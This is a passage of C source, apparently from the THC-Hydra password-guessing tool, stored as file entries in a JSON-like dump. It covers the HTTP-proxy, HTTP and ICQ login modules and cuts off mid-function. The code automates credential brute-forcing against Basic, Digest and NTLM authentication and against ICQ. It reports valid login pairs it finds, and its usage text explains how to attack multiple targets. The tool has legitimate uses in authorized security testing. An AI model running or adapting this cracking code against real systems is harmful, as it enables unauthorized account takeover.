{\n if (verbose)\n hydra_report(stderr, \"[ERROR] Server did not answer\\n\");\n return 3;\n }\n\n if (debug) {\n hydra_report(stderr, \"S:%-.*s\\n\", (int)(strchr(http_proxy_buf, '\\r') - http_proxy_buf), http_proxy_buf);\n }\n } else {\n if (http_proxy_auth_mechanism == AUTH_NTLM || hydra_strcasestr(auth_hdr, \"Proxy-Authenticate: NTLM\") != NULL) {\n unsigned char buf1[4096];\n unsigned char buf2[4096];\n char *pos = NULL;\n\n http_proxy_auth_mechanism = AUTH_NTLM;\n auth_hdr = NULL;\n // send auth and receive challenge\n // send auth request: let the server send it's own hostname and domainname\n buildAuthRequest((tSmbNtlmAuthRequest *)buf2, 0, NULL, NULL);\n to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthRequest *)buf2));\n\n /* to be portable, no snprintf, buffer is big enough so it can't overflow\n */\n // send the first..\n sprintf(buffer,\n \"GET %s HTTP/1.0\\r\\n%sProxy-Authorization: NTLM %s\\r\\nUser-Agent: \"\n \"Mozilla/4.0 (Hydra)\\r\\nProxy-Connection: keep-alive\\r\\n%s\\r\\n\",\n url, host, buf1, header);\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0)\n return 3;\n\n // receive challenge\n free(http_proxy_buf);\n http_proxy_buf = hydra_receive_line(s);\n while (http_proxy_buf != NULL && (pos = hydra_strcasestr(http_proxy_buf, \"Proxy-Authenticate: NTLM \")) == NULL) {\n free(http_proxy_buf);\n http_proxy_buf = hydra_receive_line(s);\n }\n if (pos != NULL) {\n char *str;\n\n pos += 25;\n if ((str = strchr(pos, '\\r')) != NULL) {\n pos[str - pos] = 0;\n }\n if ((str = strchr(pos, '\\n')) != NULL) {\n pos[str - pos] = 0;\n }\n }\n // recover challenge\n if (http_proxy_buf != NULL && strlen(http_proxy_buf) >= 4) {\n from64tobits((char *)buf1, pos);\n free(http_proxy_buf);\n http_proxy_buf = NULL;\n return 3;\n }\n // Send response\n buildAuthResponse((tSmbNtlmAuthChallenge *)buf1, (tSmbNtlmAuthResponse *)buf2, 0, login, pass, NULL, NULL);\n to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthResponse *)buf2));\n sprintf(buffer,\n \"GET %s HTTP/1.0\\r\\n%sProxy-Authorization: NTLM %s\\r\\nUser-Agent: \"\n \"Mozilla/4.0 (Hydra)\\r\\nProxy-Connection: keep-alive\\r\\n%s\\r\\n\",\n url, host, buf1, header);\n if (debug)\n hydra_report(stderr, \"C:%s\\n\", buffer);\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0)\n return 3;\n\n if (http_proxy_buf != NULL)\n free(http_proxy_buf);\n http_proxy_buf = hydra_receive_line(s);\n while (http_proxy_buf != NULL && strstr(http_proxy_buf, \"HTTP/1.\") == NULL) {\n free(http_proxy_buf);\n http_proxy_buf = hydra_receive_line(s);\n }\n\n if (http_proxy_buf == NULL)\n return 3;\n } else {\n#ifdef LIBOPENSSL\n if (hydra_strcasestr(auth_hdr, \"Proxy-Authenticate: Digest\") != NULL) {\n char *pbuffer, *result;\n\n http_proxy_auth_mechanism = AUTH_DIGESTMD5;\n auth_hdr = NULL;\n pbuffer = hydra_strcasestr(http_proxy_buf, \"Proxy-Authenticate: Digest \");\n strncpy(buffer, pbuffer + strlen(\"Proxy-Authenticate: Digest \"), sizeof(buffer));\n buffer[sizeof(buffer) - 1] = '\\0';\n pbuffer = NULL;\n\n fooptr = buffer2;\n result = sasl_digest_md5(fooptr, login, pass, buffer, miscptr, \"proxy\", host, 0, header);\n if (result == NULL)\n return 3;\n\n if (debug)\n hydra_report(stderr, \"C:%s\\n\", buffer2);\n if (hydra_send(s, buffer2, strlen(buffer2), 0) < 0)\n return 3;\n\n free(http_proxy_buf);\n http_proxy_buf = hydra_receive_line(s);\n while (http_proxy_buf != NULL && strstr(http_proxy_buf, \"HTTP/1.\") == NULL) {\n free(http_proxy_buf);\n http_proxy_buf = hydra_receive_line(s);\n }\n\n if (debug && http_proxy_buf != NULL) {\n hydra_report(stderr, \"S:%-.*s\\n\", (int)(strchr(http_proxy_buf, '\\r') - http_proxy_buf), http_proxy_buf);\n }\n\n if (http_proxy_buf == NULL)\n return 3;\n\n } else\n#endif\n {\n if (auth_hdr != NULL) {\n // buf[strlen(http_proxy_buf) - 1] = '\\0';\n hydra_report(stderr, \"Unsupported Auth type:\\n%-.*s\\n\", (int)(strchr(http_proxy_buf, '\\r') - auth_hdr), auth_hdr);\n auth_hdr = NULL;\n free(http_proxy_buf);\n http_proxy_buf = NULL;\n } else {\n hydra_report(stderr, \"Unsupported Auth type\\n\");\n }\n return 3;\n }\n }\n }\n\n ptr = ((char *)strchr(http_proxy_buf, ' ')) + 1;\n if (*ptr == '2' || (*ptr == '3' && *(ptr + 2) == '1') || (*ptr == '3' && *(ptr + 2) == '2') || (*ptr == '4' && *(ptr + 2) == '4')) {\n hydra_report_found_host(port, ip, \"http-proxy\", fp);\n hydra_completed_pair_found();\n free(http_proxy_buf);\n http_proxy_buf = NULL;\n } else {\n if (*ptr != '4')\n hydra_report(stderr, \"[INFO] Unusual return code: %c for %s:%s\\n\", (char)*(strchr(http_proxy_buf, ' ') + 1), login, pass);\n else if (verbose && *(ptr + 2) == '3')\n hydra_report(stderr, \"[INFO] Potential success, could be false positive: %s:%s\\n\", login, pass);\n hydra_completed_pair();\n free(http_proxy_buf);\n http_proxy_buf = hydra_receive_line(s);\n while (http_proxy_buf != NULL && hydra_strcasestr(http_proxy_buf, \"Proxy-Authenticate:\") == NULL) {\n free(http_proxy_buf);\n http_proxy_buf = hydra_receive_line(s);\n }\n }\n\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n if (http_proxy_buf != NULL)\n return 2;\n else\n return 1;\n}\n\nvoid service_http_proxy(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1;\n int32_t myport = PORT_HTTP_PROXY, mysslport = PORT_HTTP_PROXY_SSL;\n\n hydra_register_socket(sp);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n\n while (1) {\n next_run = 0;\n switch (run) {\n case 1: /* connect and service init function */\n {\n if (http_proxy_buf != NULL)\n free(http_proxy_buf);\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n // usleepn(275);\n if ((options & OPTION_SSL) == 0) {\n if (port != 0)\n myport = port;\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n } else {\n if (port != 0)\n mysslport = port;\n sock = hydra_connect_ssl(ip, mysslport, hostname);\n port = mysslport;\n }\n\n if (sock < 0) {\n if (quiet != 1)\n fprintf(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n next_run = 2;\n break;\n }\n case 2: /* run the cracking function */\n next_run = start_http_proxy(sock, ip, port, options, miscptr, fp, hostname);\n break;\n case 3: /* clean exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(0);\n return;\n default:\n fprintf(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(0);\n }\n run = next_run;\n }\n}\n\nint32_t service_http_proxy_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n return 0;\n}\n\nvoid usage_http_proxy(const char *service) {\n printf(\"Module http-proxy is optionally taking the page to authenticate at.\\n\"\n \"Default is http://www.microsoft.com/)\\n\"\n \"Basic, DIGEST-MD5 and NTLM are supported and negotiated \"\n \"automatically.\\n\\n\");\n}\n" }, { "path": "hydra-http.c", "content": "#include \"hydra-http.h\"\n#include \"sasl.h\"\n\nextern char *HYDRA_EXIT;\nchar *webtarget = NULL;\nchar *slash = \"/\";\nchar *http_buf = NULL;\n\n#define END_CONDITION_MAX_LEN 100\nstatic char end_condition[END_CONDITION_MAX_LEN];\nint end_condition_type = -1;\n\nint32_t webport;\nint32_t http_auth_mechanism = AUTH_UNASSIGNED;\n\nint32_t start_http(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp, char *type, ptr_header_node ptr_head) {\n char *empty = \"\";\n char *login, *pass, *buffer, buffer2[500];\n char *header;\n char *ptr, *fooptr;\n int32_t complete_line = 0, buffer_size;\n char tmpreplybuf[1024] = \"\", *tmpreplybufptr;\n\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n if (strcmp(type, \"POST\") == 0)\n add_header(&ptr_head, \"Content-Length\", \"0\", HEADER_TYPE_DEFAULT);\n\n header = stringify_headers(&ptr_head);\n\n buffer_size = strlen(header) + 500;\n if (!(buffer = malloc(buffer_size))) {\n free(header);\n return 3;\n }\n\n // we must reset this if buf is NULL and we do MD5 digest\n if (http_buf == NULL && http_auth_mechanism == AUTH_DIGESTMD5)\n http_auth_mechanism = AUTH_BASIC;\n\n if (use_proxy > 0 && proxy_count > 0)\n selected_proxy = random() % proxy_count;\n\n switch (http_auth_mechanism) {\n case AUTH_BASIC:\n sprintf(buffer2, \"%.50s:%.50s\", login, pass);\n hydra_tobase64((unsigned char *)buffer2, strlen(buffer2), sizeof(buffer2));\n\n /* again: no snprintf to be portable. don't worry, buffer can't overflow */\n if (use_proxy == 1 && proxy_authentication[selected_proxy] != NULL)\n sprintf(buffer,\n \"%s http://%s%.250s HTTP/1.1\\r\\nHost: %s\\r\\nConnection: \"\n \"close\\r\\nAuthorization: Basic %s\\r\\nProxy-Authorization: Basic \"\n \"%s\\r\\nUser-Agent: Mozilla/4.0 (Hydra)\\r\\n%s\\r\\n\",\n type, webtarget, miscptr, webtarget, buffer2, proxy_authentication[selected_proxy], header);\n else {\n if (use_proxy == 1)\n sprintf(buffer,\n \"%s http://%s%.250s HTTP/1.1\\r\\nHost: %s\\r\\nConnection: \"\n \"close\\r\\nAuthorization: Basic %s\\r\\nUser-Agent: Mozilla/4.0 \"\n \"(Hydra)\\r\\n%s\\r\\n\",\n type, webtarget, miscptr, webtarget, buffer2, header);\n else\n sprintf(buffer,\n \"%s %.250s HTTP/1.1\\r\\nHost: %s\\r\\nConnection: \"\n \"close\\r\\nAuthorization: Basic %s\\r\\nUser-Agent: Mozilla/4.0 \"\n \"(Hydra)\\r\\n%s\\r\\n\",\n type, miscptr, webtarget, buffer2, header);\n }\n if (debug)\n hydra_report(stderr, \"C:%s\\n\", buffer);\n break;\n\n#ifdef LIBOPENSSL\n case AUTH_DIGESTMD5: {\n char *pbuffer, *result;\n\n pbuffer = hydra_strcasestr(http_buf, \"WWW-Authenticate: Digest \");\n strncpy(buffer, pbuffer + strlen(\"WWW-Authenticate: Digest \"), buffer_size - 1);\n buffer[buffer_size - 1] = '\\0';\n\n fooptr = buffer2;\n result = sasl_digest_md5(fooptr, login, pass, buffer, miscptr, type, webtarget, webport, header);\n if (result == NULL) {\n free(buffer);\n free(header);\n return 3;\n }\n\n if (debug)\n hydra_report(stderr, \"C:%s\\n\", buffer2);\n strcpy(buffer, buffer2);\n } break;\n#endif\n\n case AUTH_NTLM: {\n unsigned char buf1[4096];\n unsigned char buf2[4096];\n char *pos = NULL;\n\n // send auth and receive challenge\n // send auth request: let the server send it's own hostname and domainname\n buildAuthRequest((tSmbNtlmAuthRequest *)buf2, 0, NULL, NULL);\n to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthRequest *)buf2));\n\n /* to be portable, no snprintf, buffer is big enough so it can't overflow */\n // send the first..\n if (use_proxy == 1 && proxy_authentication[selected_proxy] != NULL)\n sprintf(buffer,\n \"%s http://%s%s HTTP/1.1\\r\\nHost: %s\\r\\nAuthorization: NTLM \"\n \"%s\\r\\nProxy-Authorization: Basic %s\\r\\nUser-Agent: Mozilla/4.0 \"\n \"(Hydra)\\r\\n%s\\r\\n\",\n type, webtarget, miscptr, webtarget, buf1, proxy_authentication[selected_proxy], header);\n else {\n if (use_proxy == 1)\n sprintf(buffer,\n \"%s http://%s%s HTTP/1.1\\r\\nHost: %s\\r\\nAuthorization: NTLM \"\n \"%s\\r\\nUser-Agent: Mozilla/4.0 (Hydra)\\r\\n%s\\r\\n\",\n type, webtarget, miscptr, webtarget, buf1, header);\n else\n sprintf(buffer,\n \"%s %s HTTP/1.1\\r\\nHost: %s\\r\\nAuthorization: NTLM \"\n \"%s\\r\\nUser-Agent: Mozilla/4.0 (Hydra)\\r\\n%s\\r\\n\",\n type, miscptr, webtarget, buf1, header);\n }\n\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n free(buffer);\n free(header);\n return 1;\n }\n\n // receive challenge\n if (http_buf != NULL)\n free(http_buf);\n\n http_buf = hydra_receive_line(s);\n if (http_buf == NULL) {\n if (verbose)\n hydra_report(stderr, \"[ERROR] Server did not answer\\n\");\n free(buffer);\n free(header);\n return 3;\n }\n\n pos = hydra_strcasestr(http_buf, \"WWW-Authenticate: NTLM \");\n if (pos != NULL) {\n char *str;\n\n pos += 23;\n if ((str = strchr(pos, '\\r')) != NULL) {\n pos[str - pos] = 0;\n }\n if ((str = strchr(pos, '\\n')) != NULL) {\n pos[str - pos] = 0;\n }\n } else {\n hydra_report(stderr, \"[ERROR] It is not NTLM authentication type\\n\");\n return 3;\n }\n\n // recover challenge\n from64tobits((char *)buf1, pos);\n free(http_buf);\n http_buf = NULL;\n\n // Send response\n buildAuthResponse((tSmbNtlmAuthChallenge *)buf1, (tSmbNtlmAuthResponse *)buf2, 0, login, pass, NULL, NULL);\n to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthResponse *)buf2));\n\n // create the auth response\n if (use_proxy == 1 && proxy_authentication[selected_proxy] != NULL)\n sprintf(buffer,\n \"%s http://%s%s HTTP/1.1\\r\\nHost: %s\\r\\nAuthorization: NTLM \"\n \"%s\\r\\nProxy-Authorization: Basic %s\\r\\nUser-Agent: Mozilla/4.0 \"\n \"(Hydra)\\r\\n%s\\r\\n\",\n type, webtarget, miscptr, webtarget, buf1, proxy_authentication[selected_proxy], header);\n else {\n if (use_proxy == 1)\n sprintf(buffer,\n \"%s http://%s%s HTTP/1.1\\r\\nHost: %s\\r\\nAuthorization: NTLM \"\n \"%s\\r\\nUser-Agent: Mozilla/4.0 (Hydra)\\r\\n%s\\r\\n\",\n type, webtarget, miscptr, webtarget, buf1, header);\n else\n sprintf(buffer,\n \"%s %s HTTP/1.1\\r\\nHost: %s\\r\\nAuthorization: NTLM \"\n \"%s\\r\\nUser-Agent: Mozilla/4.0 (Hydra)\\r\\n%s\\r\\n\",\n type, miscptr, webtarget, buf1, header);\n }\n\n if (debug)\n hydra_report(stderr, \"C:%s\\n\", buffer);\n } break;\n }\n\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n free(buffer);\n free(header);\n return 1;\n }\n\n if (http_buf != NULL)\n free(http_buf);\n http_buf = hydra_receive_line(s);\n complete_line = 0;\n tmpreplybuf[0] = 0;\n\n while (http_buf != NULL && (strstr(http_buf, \"HTTP/1.\") == NULL || (strchr(http_buf, '\\n') == NULL && complete_line == 0))) {\n if (debug)\n printf(\"il: %d, tmpreplybuf: %s, http_buf: %s\\n\", complete_line, tmpreplybuf, http_buf);\n if (tmpreplybuf[0] == 0 && strstr(http_buf, \"HTTP/1.\") != NULL) {\n strncpy(tmpreplybuf, http_buf, sizeof(tmpreplybuf) - 1);\n tmpreplybuf[sizeof(tmpreplybuf) - 1] = 0;\n free(http_buf);\n http_buf = hydra_receive_line(s);\n } else if (tmpreplybuf[0] != 0) {\n complete_line = 1;\n if ((tmpreplybufptr = malloc(strlen(tmpreplybuf) + strlen(http_buf) + 1)) != NULL) {\n strcpy(tmpreplybufptr, tmpreplybuf);\n strcat(tmpreplybufptr, http_buf);\n free(http_buf);\n http_buf = tmpreplybufptr;\n if (debug)\n printf(\"http_buf now: %s\\n\", http_buf);\n }\n } else {\n free(http_buf);\n http_buf = hydra_receive_line(s);\n }\n }\n\n // if server cut the connection, just exit cleanly or\n // this will be an infinite loop\n if (http_buf == NULL) {\n if (verbose)\n hydra_report(stderr, \"[ERROR] Server did not answer\\n\");\n free(buffer);\n free(header);\n return 3;\n }\n\n if (debug)\n hydra_report(stderr, \"S:%s\\n\", http_buf);\n\n ptr = ((char *)strchr(http_buf, ' '));\n if (ptr != NULL)\n ptr++;\n if (ptr != NULL && (*ptr == '2' || *ptr == '3' || strncmp(ptr, \"403\", 3) == 0 || strncmp(ptr, \"404\", 3) == 0)) {\n#ifdef HAVE_PCRE\n if (end_condition_type >= 0 && hydra_string_match(http_buf, end_condition) != end_condition_type) {\n#else\n if (end_condition_type >= 0 && (strstr(http_buf, end_condition) == NULL ? 0 : 1) != end_condition_type) {\n#endif\n if (debug)\n hydra_report(stderr, \"End condition not match continue.\\n\");\n hydra_completed_pair();\n } else {\n if (debug)\n hydra_report(stderr, \"END condition %s match.\\n\", end_condition);\n hydra_report_found_host(port, ip, \"www\", fp);\n hydra_completed_pair_found();\n }\n if (http_buf != NULL) {\n free(http_buf);\n http_buf = NULL;\n }\n } else {\n if (ptr != NULL && *ptr != '4')\n fprintf(stderr, \"[WARNING] Unusual return code: %.3s for %s:%s\\n\", (char *)ptr, login, pass);\n\n // the first authentication type failed, check the type from server header\n if ((hydra_strcasestr(http_buf, \"WWW-Authenticate: Basic\") == NULL) && (http_auth_mechanism == AUTH_BASIC)) {\n // seems the auth supported is not Basic scheme so testing further\n int32_t find_auth = 0;\n\n if (hydra_strcasestr(http_buf, \"WWW-Authenticate: NTLM\") != NULL) {\n http_auth_mechanism = AUTH_NTLM;\n find_auth = 1;\n }\n#ifdef LIBOPENSSL\n if (hydra_strcasestr(http_buf, \"WWW-Authenticate: Digest\") != NULL) {\n http_auth_mechanism = AUTH_DIGESTMD5;\n find_auth = 1;\n }\n#endif\n\n if (find_auth) {\n // free(http_buf);\n // http_buf = NULL;\n free(buffer);\n free(header);\n return 1;\n }\n }\n hydra_completed_pair();\n }\n // free(http_buf);\n // http_buf = NULL;\n\n free(buffer);\n free(header);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n\n return 1;\n}\n\nvoid service_http(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname, char *type) {\n int32_t run = 1, next_run = 1, sock = -1;\n int32_t myport = PORT_HTTP, mysslport = PORT_HTTP_SSL;\n char *ptr, *ptr2;\n ptr_header_node ptr_head = NULL;\n#ifdef AF_INET6\n unsigned char addr6[sizeof(struct in6_addr)];\n#endif\n\n hydra_register_socket(sp);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n\n if (strlen(miscptr) == 0)\n miscptr = strdup(\"/\");\n if (port != 0)\n webport = port;\n else if ((options & OPTION_SSL) == 0)\n webport = myport;\n else\n webport = mysslport;\n\n /* normalise the webtarget for ipv6/port number */\n webtarget = malloc(strlen(hostname) + 1 /* null */ + 6 /* :65535 */\n#ifdef AF_INET6\n + 2 /* [] */\n#endif\n );\n#ifdef AF_INET6\n /* let libc decide if target is an ipv6 address */\n if (inet_pton(AF_INET6, hostname, addr6)) {\n ptr = webtarget + sprintf(webtarget, \"[%s]\", hostname);\n } else {\n#endif\n ptr = webtarget + sprintf(webtarget, \"%s\", hostname);\n#ifdef AF_INET6\n }\n#endif\n if (options & OPTION_SSL && webport != PORT_HTTP_SSL || !(options & OPTION_SSL) && webport != PORT_HTTP) {\n sprintf(ptr, \":%d\", webport);\n }\n ptr = NULL;\n\n /* Advance to options string */\n ptr = miscptr;\n while (*ptr != 0 && (*ptr != ':' || *(ptr - 1) == '\\\\'))\n ptr++;\n if (*ptr != 0)\n *ptr++ = 0;\n optional1 = ptr;\n\n if (!parse_options(optional1,\n &ptr_head)) // this function is in hydra-http-form.c !!\n run = 4;\n\n if (http_auth_mechanism == AUTH_UNASSIGNED)\n http_auth_mechanism = AUTH_BASIC;\n\n while (1) {\n next_run = 0;\n switch (run) {\n case 1: /* connect and service init function */\n {\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n if ((options & OPTION_SSL) == 0) {\n if (port != 0)\n myport = port;\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n } else {\n if (port != 0)\n mysslport = port;\n sock = hydra_connect_ssl(ip, mysslport, hostname);\n port = mysslport;\n }\n if (sock < 0) {\n if (quiet != 1)\n fprintf(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n next_run = 2;\n break;\n }\n case 2: /* run the cracking function */\n next_run = start_http(sock, ip, port, options, miscptr, fp, type, ptr_head);\n break;\n case 3: /* clean exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(0);\n return;\n default:\n fprintf(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(0);\n }\n run = next_run;\n }\n}\n\nvoid service_http_get(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) { service_http(ip, sp, options, miscptr, fp, port, hostname, \"GET\"); }\n\nvoid service_http_post(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) { service_http(ip, sp, options, miscptr, fp, port, hostname, \"POST\"); }\n\nvoid service_http_head(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) { service_http(ip, sp, options, miscptr, fp, port, hostname, \"HEAD\"); }\n\nint32_t service_http_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n /*POU CODE */\n char *start = strstr(miscptr, \"F=\");\n if (start == NULL)\n start = strstr(miscptr, \"S=\");\n\n if (start != NULL) {\n if (start[0] == 'F')\n end_condition_type = 0;\n else\n end_condition_type = 1;\n\n int condition_len = strlen(start);\n memset(end_condition, 0, END_CONDITION_MAX_LEN);\n if (condition_len >= END_CONDITION_MAX_LEN) {\n hydra_report(stderr, \"Condition string cannot be bigger than %u.\", END_CONDITION_MAX_LEN);\n return -1;\n }\n // copy condition witout starting string (F= or S= 2char)\n strncpy(end_condition, start + 2, condition_len - 2);\n if (debug)\n hydra_report(stderr, \"End condition is %s, mod is %d\\n\", end_condition, end_condition_type);\n\n if (*(start - 1) == ' ')\n start--;\n memset(start, '\\0', condition_len);\n if (debug)\n hydra_report(stderr, \"Modified options:%s\\n\", miscptr);\n } else {\n if (debug)\n hydra_report(stderr, \"Condition not found\\n\");\n }\n\n return 0;\n}\n\nvoid usage_http(const char *service) {\n printf(\"Module %s requires the page to authenticate.\\n\"\n \"The following parameters are optional:\\n\"\n \" (a|A)=auth-type specify authentication mechanism to use: BASIC, \"\n \"NTLM or MD5\\n\"\n \" (h|H)=My-Hdr\\\\: foo to send a user defined HTTP header with each \"\n \"request\\n\"\n \" (F|S)=check for text in the HTTP reply. S= means if this text is \"\n \"found, a\\n\"\n \" valid account has been found, F= means if this string is \"\n \"present the\\n\"\n \" combination is invalid. Note: this must be the last option \"\n \"supplied.\\n\"\n \"For example: \\\"/secret\\\" or \\\"http://bla.com/foo/bar:H=Cookie\\\\: \"\n \"sessid=aaaa\\\" or \\\"https://test.com:8080/members:A=NTLM\\\"\\n\"\n \"To attack multiple targets, you can use the -M option with a file \"\n \"containing the targets and their parameters.\\n\"\n \"Example file content:\\n\"\n \" localhost:5000/protected:A=BASIC\\n\"\n \" localhost:5002/protected_path:A=NTLM\\n\"\n \" ...\\n\\n\",\n service);\n}\n" }, { "path": "hydra-http.h", "content": "#ifndef _HYDRA_HTTP_H\n#define _HYDRA_HTTP_H\n\n#include \"hydra-mod.h\"\n\n/*\tHTTP Header Types\t*/\n#define HEADER_TYPE_USERHEADER 'h'\n#define HEADER_TYPE_USERHEADER_REPL 'H'\n#define HEADER_TYPE_DEFAULT 'D'\n#define HEADER_TYPE_DEFAULT_REPL 'd'\n\ntypedef struct header_node t_header_node, *ptr_header_node;\n\nextern char *webtarget;\nextern char *slash;\nextern char *optional1;\n\nextern int32_t parse_options(char *miscptr, ptr_header_node *ptr_head);\nextern int32_t add_header(ptr_header_node *ptr_head, char *header, char *value, char type);\nextern char *stringify_headers(ptr_header_node *ptr_head);\n#endif\n" }, { "path": "hydra-icq.c", "content": "#include \"hydra-mod.h\"\n\nextern char *HYDRA_EXIT;\nextern int32_t child_head_no;\nint32_t seq = 1;\n\nconst unsigned char icq5_table[] = {0x59, 0x60, 0x37, 0x6B, 0x65, 0x62, 0x46, 0x48, 0x53, 0x61, 0x4C, 0x59, 0x60, 0x57, 0x5B, 0x3D, 0x5E, 0x34, 0x6D, 0x36, 0x50, 0x3F, 0x6F, 0x67, 0x53, 0x61, 0x4C, 0x59, 0x40, 0x47, 0x63, 0x39, 0x50, 0x5F, 0x5F, 0x3F, 0x6F, 0x47, 0x43, 0x69, 0x48, 0x33, 0x31, 0x64, 0x35, 0x5A, 0x4A, 0x42, 0x56, 0x40, 0x67, 0x53, 0x41, 0x07, 0x6C, 0x49, 0x58, 0x3B, 0x4D, 0x46, 0x68, 0x43, 0x69, 0x48,\n 0x33, 0x31, 0x44, 0x65, 0x62, 0x46, 0x48, 0x53, 0x41, 0x07, 0x6C, 0x69, 0x48, 0x33, 0x51, 0x54, 0x5D, 0x4E, 0x6C, 0x49, 0x38, 0x4B, 0x55, 0x4A, 0x62, 0x46, 0x48, 0x33, 0x51, 0x34, 0x6D, 0x36, 0x50, 0x5F, 0x5F, 0x5F, 0x3F, 0x6F, 0x47, 0x63, 0x59, 0x40, 0x67, 0x33, 0x31, 0x64, 0x35, 0x5A, 0x6A, 0x52, 0x6E, 0x3C, 0x51, 0x34, 0x6D, 0x36, 0x50, 0x5F, 0x5F, 0x3F, 0x4F, 0x37, 0x4B, 0x35,\n 0x5A, 0x4A, 0x62, 0x66, 0x58, 0x3B, 0x4D, 0x66, 0x58, 0x5B, 0x5D, 0x4E, 0x6C, 0x49, 0x58, 0x3B, 0x4D, 0x66, 0x58, 0x3B, 0x4D, 0x46, 0x48, 0x53, 0x61, 0x4C, 0x59, 0x40, 0x67, 0x33, 0x31, 0x64, 0x55, 0x6A, 0x32, 0x3E, 0x44, 0x45, 0x52, 0x6E, 0x3C, 0x31, 0x64, 0x55, 0x6A, 0x52, 0x4E, 0x6C, 0x69, 0x48, 0x53, 0x61, 0x4C, 0x39, 0x30, 0x6F, 0x47, 0x63, 0x59, 0x60, 0x57, 0x5B, 0x3D, 0x3E,\n 0x64, 0x35, 0x3A, 0x3A, 0x5A, 0x6A, 0x52, 0x4E, 0x6C, 0x69, 0x48, 0x53, 0x61, 0x6C, 0x49, 0x58, 0x3B, 0x4D, 0x46, 0x68, 0x63, 0x39, 0x50, 0x5F, 0x5F, 0x3F, 0x6F, 0x67, 0x53, 0x41, 0x25, 0x41, 0x3C, 0x51, 0x54, 0x3D, 0x5E, 0x54, 0x5D, 0x4E, 0x4C, 0x39, 0x50, 0x5F, 0x5F, 0x5F, 0x3F, 0x6F, 0x47, 0x43, 0x69, 0x48, 0x33, 0x51, 0x54, 0x5D, 0x6E, 0x3C, 0x31, 0x64, 0x35, 0x5A, 0x00, 0x00};\n\nvoid fix_packet(char *buf, int32_t len) {\n unsigned long c1, c2;\n unsigned long r1, r2;\n int32_t pos, key, k;\n\n c1 = buf[8];\n c1 <<= 8;\n c1 |= buf[4];\n c1 <<= 8;\n c1 |= buf[2];\n c1 <<= 8;\n c1 |= buf[6];\n\n r1 = (rand() % (len - 0x18)) + 0x18;\n r2 = rand() & 0xff;\n\n c2 = r1;\n c2 <<= 8;\n c2 |= buf[r1];\n c2 <<= 8;\n c2 |= r2;\n c2 <<= 8;\n c2 |= icq5_table[r2];\n c2 ^= 0xff00ff;\n\n c1 ^= c2;\n buf[0x14] = c1 & 0xff;\n buf[0x15] = (c1 >> 8) & 0xff;\n buf[0x16] = (c1 >> 16) & 0xff;\n buf[0x17] = (c1 >> 24) & 0xff;\n\n key = len * 0x68656c6cL;\n key += c1;\n pos = 0xa;\n\n for (; pos < len; pos += 4)\n k = key + icq5_table[pos & 0xff];\n}\n\nvoid icq_header(char *buf, unsigned short cmd, unsigned long uin) {\n buf[0] = 0x02;\n buf[1] = 0x00;\n buf[2] = cmd & 0xff;\n buf[3] = (cmd >> 8) & 0xff;\n buf[4] = seq & 0xff;\n buf[5] = (seq++ >> 8) & 0xff;\n buf[6] = uin & 0xff;\n buf[7] = (uin >> 8) & 0xff;\n buf[8] = (uin >> 16) & 0xff;\n buf[9] = (uin >> 24) & 0xff;\n}\n\nint32_t icq_login(int32_t s, char *login, char *pass) {\n unsigned long uin = strtoul(login, NULL, 10);\n char buf[256];\n int32_t len;\n\n bzero(buf, sizeof(buf));\n\n icq_header(buf, 0x03e8, uin);\n len = strlen(pass) + 1;\n buf[14] = len;\n memcpy(&buf[16], pass, len);\n buf[16 + len] = 0x78;\n buf[24 + len] = 0x04;\n buf[29 + len] = 0x02;\n buf[39 + len] = 0x08;\n buf[41 + len] = 0x78;\n\n return (hydra_send(s, buf, 43 + len, 0));\n}\n\nint32_t icq_login_1(int32_t s, char *login) {\n unsigned long uin = strtoul(login, NULL, 10);\n char buf[64];\n\n icq_header(buf, 0x044c, uin);\n return 